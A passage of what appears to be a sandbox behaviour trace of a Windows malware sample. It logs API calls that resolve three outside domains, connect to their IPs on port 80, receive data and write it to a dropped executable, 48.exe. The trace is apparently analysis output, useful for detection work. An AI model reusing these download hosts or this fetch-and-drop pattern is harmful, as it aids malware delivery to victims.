SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece20) returned 1 [0088.871] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30739f0, cbSid=0x1c6ece20 | out: pSid=0x30739f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece20) returned 1 [0088.871] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30747e8, cbSid=0x1c6ece20 | out: pSid=0x30747e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece20) returned 1 [0088.871] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30755f0, cbSid=0x1c6ece20 | out: pSid=0x30755f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece20) returned 1 [0088.871] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30763f0, cbSid=0x1c6ece20 | out: pSid=0x30763f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6ece20) returned 1 [0088.872] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418 [0088.873] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x1c6ed458 | out: argp=0x1c6ed458) returned 0 [0088.873] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424 [0088.873] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x1c6ed458 | out: argp=0x1c6ed458) returned 0 [0088.874] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c6ed3d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c6ed3d0, lpOverlapped=0x0) returned -1 [0088.875] CoTaskMemAlloc (cb=0x204) returned 0x1cefb0 [0088.875] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1cefb0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0088.876] WSAEventSelect (s=0x418, hEventObject=0x420, lNetworkEvents=512) returned 0 [0088.876] WSAIoctl (in: s=0x424, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c6ed3d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c6ed3d0, lpOverlapped=0x0) returned -1 [0088.876] CoTaskMemAlloc (cb=0x204) returned 0x1cefb0 [0088.876] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1cefb0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0088.876] WSAEventSelect (s=0x424, hEventObject=0x428, lNetworkEvents=512) returned 0 [0088.876] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x42c, param_3=0x3) returned 0x0 [0088.881] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c6ed510 | out: phkResult=0x1c6ed510*=0x444) returned 0x0 [0088.881] RegOpenKeyExW (in: hKey=0x444, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ed3f8 | out: phkResult=0x1c6ed3f8*=0x448) returned 0x0 [0088.882] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0 [0088.882] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ed420 | out: phkResult=0x1c6ed420*=0x450) returned 0x0 [0088.882] RegNotifyChangeKeyValue (hKey=0x450, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x454, fAsynchronous=1) returned 0x0 [0088.882] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ed420 | out: phkResult=0x1c6ed420*=0x458) returned 0x0 [0088.882] RegNotifyChangeKeyValue (hKey=0x458, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x45c, fAsynchronous=1) returned 0x0 [0088.883] GetCurrentProcess () returned 0xffffffffffffffff [0088.883] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ed388 | out: TokenHandle=0x1c6ed388*=0x460) returned 1 [0088.889] GetCurrentProcess () returned 0xffffffffffffffff [0088.889] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecb58 | out: TokenHandle=0x1c6ecb58*=0x464) returned 1 [0088.894] GetCurrentProcess () returned 0xffffffffffffffff [0088.894] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecb58 | out: TokenHandle=0x1c6ecb58*=0x468) returned 1 [0088.910] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c6ed458 | out: pProxyConfig=0x1c6ed458) returned 1 [0088.972] SetEvent (hEvent=0x388) returned 1 [0088.987] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x1c6ed330 | out: ppwstrAutoConfigUrl=0x1c6ed330*=0x0) returned 0 [0089.002] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x1c6ed330 | out: ppwstrAutoConfigUrl=0x1c6ed330*=0x0) returned 0 [0091.628] GetCurrentProcess () returned 0xffffffffffffffff [0091.628] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecbc8 | out: TokenHandle=0x1c6ecbc8*=0x4dc) returned 1 [0091.631] GetCurrentProcess () returned 0xffffffffffffffff [0091.631] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecbc8 | out: TokenHandle=0x1c6ecbc8*=0x4d4) returned 1 [0091.632] SetEvent (hEvent=0x388) returned 1 [0091.680] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c6ed098 | out: pFixedInfo=0x0, pOutBufLen=0x1c6ed098) returned 0x6f [0091.689] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b2c99b0 [0091.689] GetNetworkParams (in: pFixedInfo=0x1b2c99b0, pOutBufLen=0x1c6ed098 | out: pFixedInfo=0x1b2c99b0, pOutBufLen=0x1c6ed098) returned 0x0 [0091.701] CoTaskMemAlloc (cb=0xd) returned 0x1b2d36c0 [0091.701] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0091.701] CoTaskMemFree (pv=0x1b2d36c0) [0091.703] LocalFree (hMem=0x1b2c99b0) returned 0x0 [0091.763] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4 [0091.763] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0 [0091.765] getaddrinfo (in: pNodeName="lesserassociates.com", pServiceName=0x0, pHints=0x1c6ed040*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed038 | out: ppResult=0x1c6ed038*=0x1b2c5ad0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="lesserassociates.com", ai_addr=0x1b2d3760*(sa_family=2, sin_port=0x0, sin_addr="192.115.76.18"), ai_next=0x0)) returned 0 [0091.772] CoTaskMemFree (pv=0x1b2d36c0) [0091.772] CoTaskMemFree (pv=0x0) [0091.773] FreeAddrInfoW (pAddrInfo=0x1b2c5ad0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="敬獳牥獡潳楣瑡獥挮浯", ai_addr=0x1b2d3760*(sa_family=2, sin_port=0x0, sin_addr="192.115.76.18"), ai_next=0x0)) [0091.773] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f0 [0091.773] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d8 [0091.773] ioctlsocket (in: s=0x4f0, cmd=-2147195266, argp=0x1c6ed058 | out: argp=0x1c6ed058) returned 0 [0091.774] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8 [0091.774] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4fc [0091.774] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0x1c6ed058 | out: argp=0x1c6ed058) returned 0 [0091.774] WSAIoctl (in: s=0x4f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c6ecfd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c6ecfd0, lpOverlapped=0x0) returned -1 [0091.774] CoTaskMemAlloc (cb=0x204) returned 0x1d0240 [0091.774] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1d0240, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0091.774] WSAEventSelect (s=0x4f0, hEventObject=0x4d8, lNetworkEvents=512) returned 0 [0091.774] WSAIoctl (in: s=0x4f8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c6ecfd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c6ecfd0, lpOverlapped=0x0) returned -1 [0091.774] CoTaskMemAlloc (cb=0x204) returned 0x1d0240 [0091.774] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1d0240, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0091.775] WSAEventSelect (s=0x4f8, hEventObject=0x4fc, lNetworkEvents=512) returned 0 [0091.776] GetAdaptersAddresses () returned 0x6f [0091.782] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b2d6d70 [0091.782] GetAdaptersAddresses () returned 0x0 [0091.789] LocalFree (hMem=0x1b2d6d70) returned 0x0 [0091.790] WSAConnect (in: s=0x4e4, name=0x30820c8*(sa_family=2, sin_port=0x50, sin_addr="192.115.76.18"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0091.880] closesocket (s=0x4e0) returned 0 [0091.898] send (s=0x4e4, buf=0x3085b80*, len=85, flags=0) returned 85 [0091.907] setsockopt (s=0x4e4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0091.907] recv (in: s=0x4e4, buf=0x307e5e8, len=4096, flags=0 | out: buf=0x307e5e8*) returned 4096 [0094.307] setsockopt (s=0x4e4, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0094.310] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.310] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.310] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.310] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.310] recv (in: s=0x4e4, buf=0x2e00960, len=582, flags=0 | out: buf=0x2e00960*) returned 582 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=2, flags=0 | out: buf=0x2df1628*) returned 2 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.310] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 278 [0094.311] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.334] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.335] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.335] recv (in: s=0x4e4, buf=0x2e00960, len=746, flags=0 | out: buf=0x2e00960*) returned 746 [0094.335] recv (in: s=0x4e4, buf=0x2df1628, len=2, flags=0 | out: buf=0x2df1628*) returned 2 [0094.335] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.340] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.340] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.340] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.340] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.341] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.341] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.341] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.341] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.341] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.341] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.342] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.342] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.342] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=2, flags=0 | out: buf=0x2df1628*) returned 2 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.342] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 554 [0094.342] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.423] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.423] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.423] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.423] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.423] recv (in: s=0x4e4, buf=0x2e00960, len=1024, flags=0 | out: buf=0x2e00960*) returned 1024 [0094.424] recv (in: s=0x4e4, buf=0x2e00960, len=738, flags=0 | out: buf=0x2e00960*) returned 738 [0094.424] recv (in: s=0x4e4, buf=0x2df1628, len=2, flags=0 | out: buf=0x2df1628*) returned 2 [0094.424] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.424] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.424] recv (in: s=0x4e4, buf=0x2df1628, len=1, flags=0 | out: buf=0x2df1628*) returned 1 [0094.424] recv (in: s=0x4e4, buf=0x2df1628, len=2, flags=0 | out: buf=0x2df1628*) returned 2 [0094.425] SetEvent (hEvent=0x388) returned 1 [0094.444] CloseHandle (hObject=0x384) returned 1 [0094.444] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6e7bc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.445] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe")) returned 1 [0094.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0094.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0094.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0094.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6e8860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0094.506] CoTaskMemAlloc (cb=0x104) returned 0x1f8b70 [0094.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f8b70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0094.506] CoTaskMemFree (pv=0x1f8b70) [0094.617] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.617] SetErrorMode (uMode=0x1) returned 0x1 [0094.617] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0094.617] GetFileType (hFile=0x36c) returned 0x1 [0094.617] SetErrorMode (uMode=0x1) returned 0x1 [0094.617] GetFileType (hFile=0x36c) returned 0x1 [0094.617] SetEvent (hEvent=0x388) returned 1 [0094.619] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a4 [0094.619] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x354 [0094.619] CoTaskMemAlloc (cb=0x15) returned 0x1b2d39a0 [0094.619] getaddrinfo (in: pNodeName="forexproservice.com", pServiceName=0x0, pHints=0x1c6ed1d0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed1c8 | out: ppResult=0x1c6ed1c8*=0x1b2c60d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="forexproservice.com", ai_addr=0x1b2d39e0*(sa_family=2, sin_port=0x0, sin_addr="80.172.234.15"), ai_next=0x0)) returned 0 [0094.622] CoTaskMemFree (pv=0x1b2d39a0) [0094.622] CoTaskMemFree (pv=0x0) [0094.622] FreeAddrInfoW (pAddrInfo=0x1b2c60d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="潦敲灸潲敳癲捩⹥潣mr", ai_addr=0x1b2d39e0*(sa_family=2, sin_port=0x0, sin_addr="80.172.234.15"), ai_next=0x0)) [0094.623] WSAConnect (in: s=0x3a4, name=0x2e47860*(sa_family=2, sin_port=0x50, sin_addr="80.172.234.15"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0094.684] closesocket (s=0x354) returned 0 [0094.684] send (s=0x3a4, buf=0x2e47af0*, len=83, flags=0) returned 83 [0094.685] setsockopt (s=0x3a4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0094.685] recv (in: s=0x3a4, buf=0x2e46050, len=4096, flags=0 | out: buf=0x2e46050*) returned 499 [0094.762] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x354 [0094.762] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0094.763] getaddrinfo (in: pNodeName="host-services.com", pServiceName=0x0, pHints=0x1c6ed1d0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ed1c8 | out: ppResult=0x1c6ed1c8*=0x1b2c5fd0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="host-services.com", ai_addr=0x1b2d39a0*(sa_family=2, sin_port=0x0, sin_addr="194.8.30.20"), ai_next=0x0)) returned 0 [0094.765] CoTaskMemFree (pv=0x1b2d39e0) [0094.765] CoTaskMemFree (pv=0x0) [0094.765] FreeAddrInfoW (pAddrInfo=0x1b2c5fd0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="潨瑳猭牥楶散⹳潣m", ai_addr=0x1b2d39a0*(sa_family=2, sin_port=0x0, sin_addr="194.8.30.20"), ai_next=0x0)) [0094.766] WSAConnect (in: s=0x354, name=0x2e4b0f8*(sa_family=2, sin_port=0x50, sin_addr="194.8.30.20"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0094.824] closesocket (s=0x4f4) returned 0 [0094.824] send (s=0x354, buf=0x2e4b380*, len=77, flags=0) returned 77 [0094.824] setsockopt (s=0x354, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0094.824] recv (in: s=0x354, buf=0x2e49918, len=4096, flags=0 | out: buf=0x2e49918*) returned 278 [0094.887] setsockopt (s=0x354, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0094.887] recv (in: s=0x354, buf=0x2e4c090, len=1492, flags=0 | out: buf=0x2e4c090*) returned 1492 [0094.889] WriteFile (in: hFile=0x36c, lpBuffer=0x2e4c758*, nNumberOfBytesToWrite=0x5d4, lpNumberOfBytesWritten=0x1c6ed718, lpOverlapped=0x0 | out: lpBuffer=0x2e4c758*, lpNumberOfBytesWritten=0x1c6ed718*=0x5d4, lpOverlapped=0x0) returned 1 [0094.894] CoTaskMemAlloc (cb=0x104) returned 0x1b2e3960 [0094.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b2e3960, nSize=0x80 | out: lpBuffer="") returned 0x0 [0094.894] CoTaskMemFree (pv=0x1b2e3960) [0094.901] CoTaskMemAlloc (cb=0x104) returned 0x1b2e3960 [0094.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b2e3960, nSize=0x80 | out: lpBuffer="") returned 0x0 [0094.901] CoTaskMemFree (pv=0x1b2e3960) [0094.921] CoTaskMemAlloc (cb=0x104) returned 0x1b2e3960 [0094.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b2e3960, nSize=0x80 | out: lpBuffer="") returned 0x0 [0094.921] CoTaskMemFree (pv=0x1b2e3960) [0094.922] CoTaskMemAlloc (cb=0x104) returned 0x1b2e3960 [0094.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b2e3960, nSize=0x80 | out: lpBuffer="") returned 0x0 [0094.922] CoTaskMemFree (pv=0x1b2e3960) [0094.927] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ece40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.927] SetErrorMode (uMode=0x1) returned 0x1 [0094.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6ed0a0 | out: lpFileInformation=0x1c6ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93664460, ftCreationTime.dwHighDateTime=0x1d4f2cf, ftLastAccessTime.dwLowDateTime=0x96e2e800, ftLastAccessTime.dwHighDateTime=0x1d4f2cf, ftLastWriteTime.dwLowDateTime=0x970b5f60, ftLastWriteTime.dwHighDateTime=0x1d4f2cf, nFileSizeHigh=0x0, nFileSizeLow=0x5d4)) returned 1 [0094.927] SetErrorMode (uMode=0x1) returned 0x1 [0094.928] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe", nBufferLength=0x105, lpBuffer=0x1c6ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\48.exe", lpFilePart=0x0) returned 0x18 [0094.928] SetErrorMode (uMode=0x1) returned 0x1 [0094.928] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\48.exe" (normalized: "c:\\users\\aetadzjz\\48.exe"), 